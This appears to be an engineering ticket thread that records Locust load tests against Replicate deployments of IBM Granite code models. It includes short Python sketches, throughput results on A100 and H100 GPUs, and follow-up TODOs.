Locust testing framework under development targeting Replicate's HTTP interface.
Will publish a quick test baseline + results shortly. I don't foresee any heavy lifting here.
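For concreteness, here is a minimal sketch of the kind of Locust user involved, assuming a Replicate deployment is hit over HTTP. The deployment slug, env var, and prompt are placeholders, not the actual script:

```python
# Minimal sketch, not the actual script: one Locust user POSTing predictions
# to a Replicate deployment over HTTP. Deployment slug and prompt are placeholders.
import os

from locust import HttpUser, between, task

REPLICATE_TOKEN = os.environ["REPLICATE_API_TOKEN"]
DEPLOYMENT = "ibm-granite/granite-8b-code-instruct-128k"  # hypothetical deployment slug

class ReplicateHttpUser(HttpUser):
    host = "https://api.replicate.com"
    wait_time = between(1, 2)  # tuned per scenario to hit the target req/sec

    @task
    def create_prediction(self):
        self.client.post(
            f"/v1/deployments/{DEPLOYMENT}/predictions",
            headers={"Authorization": f"Bearer {REPLICATE_TOKEN}"},
            json={"input": {"prompt": "Write a Python function to reverse a string."}},
            name="create_prediction",
        )
```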
Tested scenarios from 1 req/sec up to 30 req/sec under a "1 A100 80 GB GPU that can scale up to 2" configuration, running for 1 hour at a time.
TL;DR:

- 20 req/sec: everything behaves as expected. This is the first rate that requires scaling up from 1 GPU to 2; the scale-up happens immediately and persists for the entire 1-hour run.
- 25 req/sec: unstable.
- 30 req/sec: oversaturated, resulting in extensive queuing of requests.
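For reference, one standard way to drive a fixed request rate in Locust is `constant_throughput`: each simulated user issues at most one request per second, so the user count approximates the target req/sec. This is a sketch under that assumption; the actual pacing in the script may differ.

```python
# Sketch of rate pacing (the script's actual pacing may differ): with
# constant_throughput(1), each user fires at most 1 request/sec, so e.g.
#   locust -f replicate_load.py --headless -u 20 -r 20 -t 1h
# approximates 20 req/sec for a full hour.
from locust import HttpUser, constant_throughput, task

class PacedReplicateUser(HttpUser):
    host = "https://api.replicate.com"
    wait_time = constant_throughput(1)

    @task
    def create_prediction(self):
        ...  # same POST body as in the sketch above
```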
I'll have to repeat some of these to make sure behavior is consistent.
I'll publish all data and results as soon as I find a place for them, and then call a review.
Reviewed the current state and overall results with the larger group at a meeting yesterday afternoon.
TODOs:

- Switch to the H100s.
- Switch to dynamic prompts.
- Figure out how to tabulate the duration metrics server-side.
- Discuss our results with Replicate tech support to confirm that our assumptions about interpreting the UI graphs are accurate.
- Possibly switch from the HTTP interface to the Replicate SDK in Locust.
- Find a home for the code base and results.
Running the tests on the H100s now. They are not nearly as scalable or resilient as the A100s.
Switched to dynamic prompts using the HF `datasets` library and the HF Python code-completion dataset `iamtarun/python_code_instructions_18k_alpaca`.
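Roughly like this (a sketch; the `instruction` column and uniform random sampling are assumptions about the actual implementation):

```python
# Sketch of the dynamic-prompt sampling; the "instruction" column and
# uniform random sampling are assumptions about the actual implementation.
import random

from datasets import load_dataset

ds = load_dataset("iamtarun/python_code_instructions_18k_alpaca", split="train")
prompts = ds["instruction"]

def random_prompt() -> str:
    """Return a randomly chosen prompt for the next Locust request."""
    return random.choice(prompts)
```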
Added a second set of tests that use the Replicate SDK, and modified those tests to wait for the response. Those tests did not execute cleanly, and throughput was much lower than expected (30 users resulted in 3 requests per second). Will revisit; a sketch of the SDK variant follows.
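A rough sketch of the SDK-based variant (the deployment slug and event bookkeeping are assumptions). If each SDK call blocks its simulated user for the full generation time, per-user throughput is capped at roughly one request per generation latency, which would be consistent with 30 users yielding only ~3 req/sec:

```python
# Rough sketch, assuming a blocking create-and-wait per task; since each Locust
# user runs tasks sequentially, long generations directly cap per-user throughput.
import time

import replicate
from locust import User, task

class ReplicateSDKUser(User):
    @task
    def create_and_wait(self):
        start = time.perf_counter()
        exc = None
        try:
            deployment = replicate.deployments.get(
                "ibm-granite/granite-8b-code-instruct-128k"  # hypothetical slug
            )
            prediction = deployment.predictions.create(
                input={"prompt": "Write a Python function to reverse a string."}
            )
            prediction.wait()  # block until the prediction completes
        except Exception as e:
            exc = e
        # Report the call to Locust's stats, since there is no HttpUser client here.
        self.environment.events.request.fire(
            request_type="SDK",
            name="create_and_wait",
            response_time=(time.perf_counter() - start) * 1000,
            response_length=0,
            exception=exc,
            context={},
        )
```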
Also, I will create a new ticket at some point to use the Replicate API to dump performance data into Airtable, since most metrics in Replicate time out after an hour.
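A hedged sketch of what that ticket might cover (the Airtable base/table IDs, field names, and exact prediction fields are placeholders):

```python
# Hedged sketch for the future ticket: copy recent prediction metrics out of
# Replicate before they age out. IDs and field names below are placeholders.
import os

import replicate
from pyairtable import Api

table = Api(os.environ["AIRTABLE_API_KEY"]).table(
    "appXXXXXXXXXXXXXX",   # hypothetical base ID
    "replicate_metrics",   # hypothetical table name
)

page = replicate.predictions.list()  # most recent predictions
for prediction in page.results:
    metrics = prediction.metrics or {}
    table.create({
        "prediction_id": prediction.id,
        "status": prediction.status,
        "created_at": str(prediction.created_at),
        "predict_time_s": metrics.get("predict_time"),
    })
```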
Final numbers for ibm-granite/granite-8b-code-instruct-128k on the H100s (20x CPU / 80 GB GPU RAM / 72 GB RAM, x2): 7.6 requests per second sustained. At 8.7 requests per second, the deployment autoscales from 2 to 3 GPUs, and an ever-increasing queue begins building that it never recovers from.
Final numbers for ibm-granite/granite-20b-code-instruct-8k on the H100s (20x CPU / 80 GB GPU RAM / 72 GB RAM, x1): 6.1 req/sec causes a scale-up from 1 GPU to 2, and both the scale-up and the subsequent scale-down are clean. 7.5 req/sec causes a scale-up from 1 GPU to 2 and results in queuing that does not clear until the test is over.
Recommend closing this ticket and opening a new one to find a place to park the Locust script and report all the detailed results. Perhaps a deployment repo in the public ibm-granite GitHub org?